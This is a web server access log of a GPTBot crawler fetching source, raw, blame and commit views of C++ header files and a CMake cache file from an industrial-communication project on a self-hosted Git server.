"/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/transport_state.hpp" [Client 74.7.227.38] [Length 11397] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:40:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" [Client 74.7.227.38] [Length 11792] [Gzip 3.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:40:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 12759] [Gzip 4.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:40:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/logger.hpp" [Client 74.7.227.38] [Length 13094] [Gzip 4.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:40:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/itransport.hpp" [Client 74.7.227.38] [Length 10213] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/itransport.hpp" -[17/Feb/2026:15:40:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" [Client 74.7.227.38] [Length 10245] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" -[17/Feb/2026:15:40:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 9932] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/include/controller.hpp" -[17/Feb/2026:15:40:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/itransport.hpp" [Client 74.7.227.38] [Length 10237] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/itransport.hpp" -[17/Feb/2026:15:40:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" [Client 74.7.227.38] [Length 11523] [Gzip 3.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" -[17/Feb/2026:15:40:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/itransport.hpp" [Client 74.7.227.38] [Length 10235] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/itransport.hpp" -[17/Feb/2026:15:40:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/itransport.hpp" [Client 74.7.227.38] [Length 1182] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/itransport.hpp" -[17/Feb/2026:15:40:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/transport_state.hpp" [Client 74.7.227.38] [Length 10526] [Gzip 3.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/transport_state.hpp" -[17/Feb/2026:15:40:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" [Client 74.7.227.38] [Length 10220] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" -[17/Feb/2026:15:40:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 10434] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/controller.hpp" -[17/Feb/2026:15:40:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/logger.hpp" [Client 74.7.227.38] [Length 9961] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/logger.hpp" -[17/Feb/2026:15:40:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/logger.hpp" [Client 74.7.227.38] [Length 1143] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/logger.hpp" -[17/Feb/2026:15:40:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/logger.hpp" [Client 74.7.227.38] [Length 1143] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/logger.hpp" -[17/Feb/2026:15:40:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" [Client 74.7.227.38] [Length 424] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" -[17/Feb/2026:15:40:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/logger.hpp" [Client 74.7.227.38] [Length 9988] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/logger.hpp" -[17/Feb/2026:15:40:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 12018] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:40:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/logger.hpp" [Client 74.7.227.38] [Length 12673] [Gzip 6.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/logger.hpp" -[17/Feb/2026:15:40:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/logger.hpp" [Client 74.7.227.38] [Length 13131] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:40:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/transport_state.hpp" [Client 74.7.227.38] [Length 11432] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:40:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/itransport.hpp" [Client 74.7.227.38] [Length 13027] [Gzip 5.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/itransport.hpp" -[17/Feb/2026:15:40:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/transport_error.hpp" [Client 74.7.227.38] [Length 12511] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:40:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/itransport.hpp" [Client 74.7.227.38] [Length 1182] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/itransport.hpp" -[17/Feb/2026:15:40:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 11170] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:15:40:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 12759] [Gzip 4.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:40:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" [Client 74.7.227.38] [Length 11823] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:40:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/transport_state.hpp" [Client 74.7.227.38] [Length 11430] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:40:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 11317] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" -[17/Feb/2026:15:40:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 11171] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:15:40:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/logger.hpp" [Client 74.7.227.38] [Length 1143] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/logger.hpp" -[17/Feb/2026:15:40:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/transport_state.hpp" [Client 74.7.227.38] [Length 10523] [Gzip 3.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/transport_state.hpp" -[17/Feb/2026:15:40:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/transport_state.hpp" [Client 74.7.227.38] [Length 122] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/transport_state.hpp" -[17/Feb/2026:15:40:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/logger.hpp" [Client 74.7.227.38] [Length 12703] [Gzip 6.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/logger.hpp" -[17/Feb/2026:15:40:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/transport_error.hpp" [Client 74.7.227.38] [Length 886] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/transport_error.hpp" -[17/Feb/2026:15:40:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 9957] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:15:40:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 10434] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/controller.hpp" -[17/Feb/2026:15:40:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" [Client 74.7.227.38] [Length 10245] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" -[17/Feb/2026:15:40:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 10083] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:15:40:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 13641] [Gzip 7.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/controller.hpp" -[17/Feb/2026:15:40:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 9960] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:15:40:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 10085] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:15:40:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 1611] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/controller.hpp" -[17/Feb/2026:15:40:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 85] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:15:40:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/logger.hpp" [Client 74.7.227.38] [Length 12704] [Gzip 6.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/logger.hpp" -[17/Feb/2026:15:40:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 12019] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:41:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 9958] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" -[17/Feb/2026:15:41:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr 